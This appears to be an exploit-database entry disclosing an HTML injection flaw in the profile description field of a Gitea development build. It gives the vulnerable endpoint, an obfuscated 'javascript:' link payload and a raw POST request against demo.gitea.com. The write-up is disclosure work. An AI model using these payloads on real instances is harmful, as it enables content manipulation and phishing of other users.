## https://sploitus.com/exploit?id=PACKETSTORM:189480
Title: Gitea 1.24.0+dev HTML Injection Vulnerability
Description:
Gitea version 1.24.0+dev-355-g74c8e95e87 is vulnerable to an HTML Injection
vulnerability. The issue arises due to improper input validation in the
profile settings description field, allowing an attacker to inject
arbitrary HTML elements. This could lead to potential security risks such
as content manipulation or phishing attacks if exploited effectively.
Source URL: https://gitea.com/
Source Name/Email: Arda
CVEs: (No CVE assigned yet)
Software URL: https://demo.gitea.com/
Proof of Concept (PoC):
Vulnerable Endpoint:
URL: https://demo.gitea.com/user/settings
Method: POST
Parameter Affected: description
Vulnerability Type: HTML Injection
Payload Example:
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
Request Example:
POST /user/settings HTTP/2
Host: demo.gitea.com
_csrf=xxxx&full_name=&description=%3Ch1%3Etest%3C%2Fh1%3E&website=&location=&visibility=0&keep_email_private=on
This vulnerability allows an attacker to inject arbitrary HTML content,
which may lead to XSS-like behavior depending on how the injected content
is interpreted by the browser.
Best Regards,
Arda